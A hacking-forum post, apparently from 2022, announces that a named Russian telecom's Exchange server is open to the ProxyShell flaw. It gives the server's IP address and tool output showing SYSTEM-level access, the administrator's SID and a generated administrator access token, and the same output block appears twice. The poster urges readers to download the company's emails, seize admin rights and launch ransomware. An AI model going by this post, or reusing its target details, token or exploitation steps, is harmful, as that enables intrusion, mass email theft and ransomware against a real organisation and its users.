OP 05 April, 2022 - 09:46 PM
(This post was last modified: 05 April, 2022 - 09:57 PM by SherlockHemredge. Edited 2 times in total.)
So i have recently found https://bigtelecom.ru/ to be vulnerable to proxyshell. I know right now that a lot of h4x0rs are against russia so if anyone viewing this wishes to go further with this target then be my guest. Now it's public you'll need to be quick before they patch their exchange server!
From here you could download all their emails, try and get admin to then launch ransomware. It's up to you
POC: 87.255.0.101
[+] Exchange Backend Servers: ['adfs.bigtelecom.ru']
[+] adfs.bigtelecom.ru - version: 15.2.858.2
[+] adfs.bigtelecom.ru - version_short: Exchange Server 2019
[+] adfs.bigtelecom.ru - user: NT AUTHORITY\СИСТЕМА
[+] adfs.bigtelecom.ru - sid: S-1-5-18
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 0 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'bigtelecom.ru'}
[+] Attempting to discover SID via 7 builtin email combinations
[+] Retrieved LegacyDN: /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+] Identified backend SMTP domain: bigtelecom.ru
[+] Attempting to retrieve SID for /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-811240374-227453161-2850703647-500
[-] No emails enumerated - skipping SID discovery via this method
[-] Failed finding SID via user emails
[+] RID Cycled: S-1-5-21-811240374-227453161-2850703647-500
[+] Generated token for [email protected] - S-1-5-21-811240374-227453161-2850703647-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBtBZG1pbmlzdHJhdG9yQGJpZ3RlbGVjb20ucnVVK1MtMS01LTIxLTgxMTI0MDM3NC0yMjc0NTMxNjEtMjg1MDcwMzY0Ny01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=
PS> Get-Mailbox (https://archive.ph/bP5uU)
From here you could download all their emails, try and get admin to then launch ransomware. It's up to you
POC: 87.255.0.101
[+] Exchange Backend Servers: ['adfs.bigtelecom.ru']
[+] adfs.bigtelecom.ru - version: 15.2.858.2
[+] adfs.bigtelecom.ru - version_short: Exchange Server 2019
[+] adfs.bigtelecom.ru - user: NT AUTHORITY\СИСТЕМА
[+] adfs.bigtelecom.ru - sid: S-1-5-18
[+] Attempting to retrieve Active Directory emails...
[+] Enumerated 0 possible UserMailbox LegacyDNs from Active Directory
[+] Enumerated 0 possible User LegacyDNs from Active Directory
[+] Enumerated SMTP domains: {'bigtelecom.ru'}
[+] Attempting to discover SID via 7 builtin email combinations
[+] Retrieved LegacyDN: /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+] Identified backend SMTP domain: bigtelecom.ru
[+] Attempting to retrieve SID for /o=BIG Telecom/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=userc3250b7a
[+] Successfully parsed SID via UserMailbox object: S-1-5-21-811240374-227453161-2850703647-500
[-] No emails enumerated - skipping SID discovery via this method
[-] Failed finding SID via user emails
[+] RID Cycled: S-1-5-21-811240374-227453161-2850703647-500
[+] Generated token for [email protected] - S-1-5-21-811240374-227453161-2850703647-500
[+] Token: VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBtBZG1pbmlzdHJhdG9yQGJpZ3RlbGVjb20ucnVVK1MtMS01LTIxLTgxMTI0MDM3NC0yMjc0NTMxNjEtMjg1MDcwMzY0Ny01MDBHAQAAAAcAAAAMUy0xLTUtMzItNTQ0RQAAAAA=
PS> Get-Mailbox (https://archive.ph/bP5uU)